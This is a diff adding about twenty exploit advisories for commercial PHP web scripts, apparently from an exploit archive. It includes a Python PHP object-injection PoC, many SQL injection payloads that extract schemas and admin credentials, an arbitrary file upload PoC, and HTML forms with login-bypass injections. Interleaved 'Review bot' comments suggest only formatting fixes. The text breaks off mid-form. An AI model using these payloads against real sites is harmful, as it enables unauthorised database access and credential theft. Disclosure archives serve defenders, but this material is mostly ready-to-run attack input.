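+229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
+
+2. vulnerable code on Functions/Shortcodes.php <= not tested
+
+POC
+1. use a WP plugin to test php object injection,
+like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
+
+2. make a request
+#-----------------------------------
+#! /usr/bin/python
+import requests
+url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
+data = {'action':'upcp_add_to_cart'}
+headers = {
+'Content-type': 'application/x-www-form-urlencoded',
+'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
+}
+r = requests.post(url, data=data, headers=headers)
+
+print r.content
+
+#------------------------------------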
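Review bot: The file is stored with a `.py` extension but most of it — the "tested on app version" line, the numbered PHP listing, and the POC steps — is plain prose outside any comment, so the file is not a valid Python module and would fail to parse if executed; either prefix that prose with `#` or keep only the request snippet under `.py` and move the rest to the header. The snippet is also Python 2 only (`print r.content` on the last code line); a `print(r.content)` form, or a `# Python 2` remark in the header, would save readers a failed run. The header gives `# Version: [<= 4.2.24]` but no fixed version, so a `# Fixed in:` line with the vendor's release, once confirmed, would complete the record.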
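--- a/platforms/php/webapps/43066.txt
+++ b/platforms/php/webapps/43066.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: Zomato Clone Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
+# Demo: http://jhinstitute.com/demo/foodpanda/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15993
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]
+#
+# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-
+#
+# Parameter: resid (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: resid=-9239 OR 3532=3532#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: resid=539 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: MySQL UNION query (87) - 10 columns
+# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#
+#
+# Etc..
+# # # # #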
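Review bot: The title line `# Exploit Title: Zomato Clone Script - SQL Injection` omits the vulnerable parameter, although the "Parameter: resid (GET)" line below and the files.csv row for 43066 both name it, and 43067 in this same commit puts its parameter in the title; `# Exploit Title: Zomato Clone Script - 'resid' SQL Injection` keeps the file and the index in step. The description line is the template text "The vulnerability allows an attacker to inject sql commands...." and says nothing about which page or input is affected; one sentence naming restaurant-menu.php and the resid GET parameter would make the advisory self-describing. The same unchanged template description appears in 43067.txt and 43068.txt.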
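--- a/platforms/php/webapps/43067.txt
+++ b/platforms/php/webapps/43067.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
+# Demo: http://www.officialwebsiteforsale.com/official/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15992
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/status_list.php?status_id=[SQL]
+#
+# -12'++/*!50000UNION*/+/*!50000SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--+-
+#
+# Parameter: status_id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: status_id=12' AND 2717=2717 AND 'fNVA'='fNVA
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 5 columns
+# Payload: status_id=-1351' UNION ALL SELECT NULL,CONCAT(0x71716b7a71,0x4857455572714d7a48506145547643734d6b794f515a506d6469764f5666736c6d754c7468444178,0x716a6b6271),NULL,NULL,NULL-- AJcv
+#
+# Etc..
+# # # # #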
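--- a/platforms/php/webapps/43068.txt
+++ b/platforms/php/webapps/43068.txt
@@ -0,0 +1,66 @@
+# # # # #
+# Exploit Title: Vastal I-Tech Agent Zone - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://vastal.com/
+# Software http://vastal.com/agent-zone-real-estate-script.html
+# Demo: http://agentzone.vastal.com/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15991
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/searchCommercial.php?property_type=[SQL]&city=[SQL]&posted_by=[SQL]
+#
+# http://localhost/[PATH]/searchResidential.php?property_type=[SQL]&city=[SQL]&bedroom=[SQL]
+#
+# Parameter: city (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=&city=-5275 OR 1703=1703#&posted_by=
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=&city=-1769 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (2860=2860) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&posted_by=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+# Payload: property_type=&city=(CASE WHEN (9487=9487) THEN SLEEP(5) ELSE 9487 END)&posted_by=
+#
+# Parameter: posted_by (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=&city=&posted_by=-5550 OR 1335=1335#
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=&city=&posted_by=-9423 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (4134=4134) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+# Payload: property_type=&city=&posted_by=(CASE WHEN (3754=3754) THEN SLEEP(5) ELSE 3754 END)
+#
+# Parameter: property_type (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload: property_type=-8633 OR 6527=6527#&city=&posted_by=
+#
+# Type: error-based
+# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+# Payload: property_type=-4342 OR 1 GROUP BY CONCAT(0x7171787671,(SELECT (CASE WHEN (3911=3911) THEN 1 ELSE 0 END)),0x71766a7071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&city=&posted_by=
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 time-based blind - Parameter replace
+# Payload: property_type=(CASE WHEN (2911=2911) THEN SLEEP(5) ELSE 2911 END)&city=&posted_by=
+#
+# Etc..
+# # # # #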
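Review bot: The header line `# Software http://vastal.com/agent-zone-real-estate-script.html` drops the `Link:` label that every other advisory in this commit uses, so anything that parses these headers by field name (`Software Link:`) will not find it. The same omission appears in 43071 (`# Software http://www.nicephpscripts.com/...`), 43084 (`# Software http://vastal.com/dating-zone-...`) and 43086 (`# Software http://www.sokial.net/...`). Change it to `# Software Link: http://vastal.com/agent-zone-real-estate-script.html` and likewise in the other three files.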
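--- a/platforms/php/webapps/43069.txt
+++ b/platforms/php/webapps/43069.txt
@@ -0,0 +1,53 @@
+# # # # #
+# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://savsofteproducts.com/
+# Software Link: http://www.phpinventory.com/
+# Demo: http://phpinventory.com/phpinventory_demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15990
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+#
+# The vulnerability allows an users upload arbitrary file....
+#
+# Vulnerable Source:
+#
+# .............1
+# if($_FILES['userfile']['name']!=''){
+# $target = 'images/user_pics/';
+# $targets = $target . basename( $_FILES['userfile']['name']);
+# $docadd=($_FILES['userfile']['name']);
+# if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets))
+# {
+# $pfilename=$_FILES['userfile']['name'];
+# $filename=time().$pfilename;
+# $new_path=$target.$filename;
+# rename($targets,$new_path);
+# }
+#
+#}else{
+#$filename=$_POST['user_picname'];
+#}
+# .............2,3,4
+# $target = 'images/logo/';
+# $target = 'images/product_images/';
+# $target = 'images/service_providers/';
+# Etc..
+# .............
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/
+#
+# http://localhost/[PATH]/images/user_pics/[...].php
+#
+# Etc..
+# # # # #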
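Review bot: The "Vulnerable Source" excerpt shows the root cause but the Description never names it: `move_uploaded_file` stores `basename($_FILES['userfile']['name'])` under `images/user_pics/` with no extension or content-type check, and the later `rename` keeps the client-supplied name with only a `time()` prefix, so the file stays reachable under the web root as shown by the PoC path. A maintainer would be better served by one remediation line in the Description, e.g. `# Fix: validate the extension against an allow-list, store uploads under a server-generated name, and deny script execution under images/`. The Description sentence itself is garbled; `# The vulnerability allows an users upload arbitrary file....` should read `# The vulnerability allows a user to upload an arbitrary file.`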
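--- a/platforms/php/webapps/43070.txt
+++ b/platforms/php/webapps/43070.txt
@@ -0,0 +1,40 @@
+# # # # #
+# Exploit Title: Online Exam Test Application - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/1z2e4672468/php-scripts/online-exam-test-application
+# Demo: http://198.38.86.159/~onlineexamboard/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15989
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/resources.php?action=category&sort=[SQL]
+#
+# -8++/*!07777UNION*/+/*!07777SELECT*/+0x31,0x32,0x496873616e2053656e63616e,(/*!07777Select*/+export_set(5,@:=0,(/*!07777select*/+count(*)/*!07777from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!07777table_name*/,0x3c6c693e,2),/*!07777column_name*/,0xa3a,2)),@,2))--+-
+#
+# Parameter: sort (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: action=category&sort=8 AND 5525=5525
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: action=category&sort=8 AND SLEEP(5)
+#
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 4 columns
+# Payload: action=category&sort=8 UNION ALL SELECT NULL,NULL,CONCAT(0x7176707a71,0x77654f6a51797a6c7755546b54574f68467842734c4268517654667a6e584e63634871574f4f454e,0x716b766a71),NULL-- Yhyw
+#
+# Etc..
+# # # # #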
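--- a/platforms/php/webapps/43071.txt
+++ b/platforms/php/webapps/43071.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Nice PHP FAQ Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.nicephpscripts.com/
+# Software http://www.nicephpscripts.com/demo_php_script-PHP-FAQ-Script-Knowledgebase-Script.htm
+# Demo: http://www.nicephpscripts.com/scripts/faqscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15988
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?nice_theme=[SQL]
+#
+# Parameter: nice_theme (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: nice_theme=3 AND 5083=5083
+#
+# Etc..
+# # # # #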
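--- a/platforms/php/webapps/43072.txt
+++ b/platforms/php/webapps/43072.txt
@@ -0,0 +1,49 @@
+# # # # #
+# Exploit Title: Fake Magazine Cover Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software Link: http://www.websitescripts.org/website-scripts/fake-magazine-cover-script/prod_81.html
+# Demo: http://websitescripts.org/demo/magazinecoverscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15987
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/rate.php?value=[SQL]
+#
+# -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+-
+#
+# http://localhost/[PATH]/content.php?id=[SQL]
+#
+# -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+-
+#
+# Parameter: value (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: value=1047 AND 6465=6465
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: value=1047 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=237 AND 1343=1343
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=237 AND SLEEP(5)
+#
+# Etc..
+# # # # #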
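--- a/platforms/php/webapps/43073.txt
+++ b/platforms/php/webapps/43073.txt
@@ -0,0 +1,29 @@
+<!--
+# # # # #
+# Exploit Title: CPA Lead Reward Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.websitescripts.org/
+# Software Link: http://www.websitescripts.org/website-scripts/cpa-lead-reward-script-incentive-script-/prod_68.html
+# Demo: http://www.websitescripts.org/demo/cpaleadrewardscript/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15986
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# # # # #
+-->
+<form action="http://localhost/[PATH]/index.php" method="post">
+<input type="text" name="username" value="' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e202d ,(SELECT (ELT(4=4,1))),VERSiON(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'efe'='"/>
+<input name="password" type="password" value="eFe"/>
+<input type="Submit" name="login" value="Ver Ayari" />
+</form>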
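--- a/platforms/php/webapps/43074.txt
+++ b/platforms/php/webapps/43074.txt
@@ -0,0 +1,44 @@
+# # # # #
+# Exploit Title: Basic B2B Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/nC3F4570353/php-scripts/basic-b2b-script
+# Demo: http://readymadeb2bscript.com/product/entrepreneur/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15985
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/product_view1.php?pid=[SQL]
+#
+# -19'++/*!03333UNION*/+/*!03333SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,(/*!03333Select*/+export_set(5,@:=0,(/*!03333select*/+count(*)/*!03333from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!03333table_name*/,0x3c6c693e,2),/*!03333column_name*/,0xa3a,2)),@,2)),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+-
+#
+# http://localhost/[PATH]/productcompanyinfo.php?id=[SQL]
+#
+#
+# Parameter: pid (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=19' AND SLEEP(5) AND 'zgOs'='zgOs
+#
+# Parameter: id (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: id=309' AND 2824=2824 AND 'AWCd'='AWCd
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: id=309' AND SLEEP(5) AND 'BTCw'='BTCw
+#
+# Etc..
+# # # # #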
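--- a/platforms/php/webapps/43075.txt
+++ b/platforms/php/webapps/43075.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: Creative Management System - CMS Lite 1.4 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://bekirk.co.uk/
+# Software Link: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
+# Demo: http://demo.bekirk.co.uk/
+# Version: 1.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15984
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?S=[SQL]
+#
+# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x3a,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))),0)--+-
+#
+# Parameter: S (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload: S=BeDark' AND 7998=7998 AND 'QNRN'='QNRN
+#
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: S=BeDark' AND SLEEP(5) AND 'DmYc'='DmYc
+#
+# Etc..
+# # # # #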
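--- a/platforms/php/webapps/43076.txt
+++ b/platforms/php/webapps/43076.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: MyMagazine Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/mymagazine-bootstrap-newspaper-magazine-and-blog-cms-script/19620468
+# Demo: http://demo.geniusocean.com/mymagazine/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15983
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
+#
+# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
+#
+# Etc..
+# # # # #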
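--- a/platforms/php/webapps/43077.txt
+++ b/platforms/php/webapps/43077.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: News Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/news-dynamic-newspaper-magazine-and-blog-cms-script/19656143
+# Demo: http://demo.geniusocean.com/news/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15982
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin_process.php?act=vdoeditform&id=[SQL]
+#
+# -1'++/*!50000UNION*/+/*!50000SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),VersiON(),0x34,0x35,0x36--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -1'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022From*/+admin--+-
+#
+# Etc..
+# # # # #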
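--- a/platforms/php/webapps/43078.txt
+++ b/platforms/php/webapps/43078.txt
@@ -0,0 +1,31 @@
+# # # # #
+# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://geniusocean.com/
+# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
+# Demo: http://demo.geniusocean.com/newspaper/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15981
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
+#
+# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
+#
+# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
+#
+# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
+#
+# Etc..
+# # # # #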
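--- a/platforms/php/webapps/43079.txt
+++ b/platforms/php/webapps/43079.txt
@@ -0,0 +1,32 @@
+# # # # #
+# Exploit Title: US Zip Codes Database Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://rowindex.com/
+# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
+# Demo: http://rowindex.com/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15980
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
+#
+# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+#
+# Parameter: state (GET)
+# Type: UNION query
+# Title: Generic UNION query (NULL) - 1 column
+# Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
+#
+# Etc..
+# # # # #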
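--- a/platforms/php/webapps/43080.txt
+++ b/platforms/php/webapps/43080.txt
@@ -0,0 +1,30 @@
+# # # # #
+# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: https://odallated.com/
+# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
+# Demo: https://odallated.com/shareet/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15979
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/?photo=[SQL]
+#
+# Parameter: photo (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
+#
+# Etc..
+# # # # #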
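--- a/platforms/php/webapps/43081.txt
+++ b/platforms/php/webapps/43081.txt
@@ -0,0 +1,36 @@
+# # # # #
+# Exploit Title: AROX School ERP PHP Script - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://arox.in/
+# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
+# Demo: http://erp1.arox.in/
+# Version: CVE-2017-15978
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
+# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
+#
+# Parameter: id (GET)
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload: pid=95&action=edit&id=3 AND SLEEP(5)
+#
+# Etc..
+# # # # #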
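Review bot: The `# Version:` and `# CVE:` header fields are swapped: `# Version: CVE-2017-15978` carries the CVE id and `# CVE: N/A` carries the version placeholder, so a lookup keyed on this file's `CVE:` field finds nothing. Change them to `# Version: N/A` and `# CVE: CVE-2017-15978`. The two `# Parameter: id (GET)` blocks also describe the same parameter under two different `action` values; naming the action in each, e.g. `# Parameter: id (GET, action=edit)`, would make the second block readable on its own.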
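--- a/platforms/php/webapps/43082.txt
+++ b/platforms/php/webapps/43082.txt
@@ -0,0 +1,46 @@
+<!--
+# # # # #
+# Exploit Title: Protected Links - Expiring Download Links - SQL Injection
+# Dork: N/A
+# Date: 30.10.2017
+# Vendor Homepage: http://sixthlife.net/
+# Software Link: https://codecanyon.net/item/protected-links-expiring-download-links/2556861
+# Demo: http://protectedlinks.net/demo/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2017-15977
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/admin
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
+-->
+<form name="login" method="post" action="http://localhost/[PATH]/index.php">
+<div id="login">
+<table width="200" border="0">
+<tr>
+<td height="45"><p>Username</p></td>
+<td><label for="textfield"></label>
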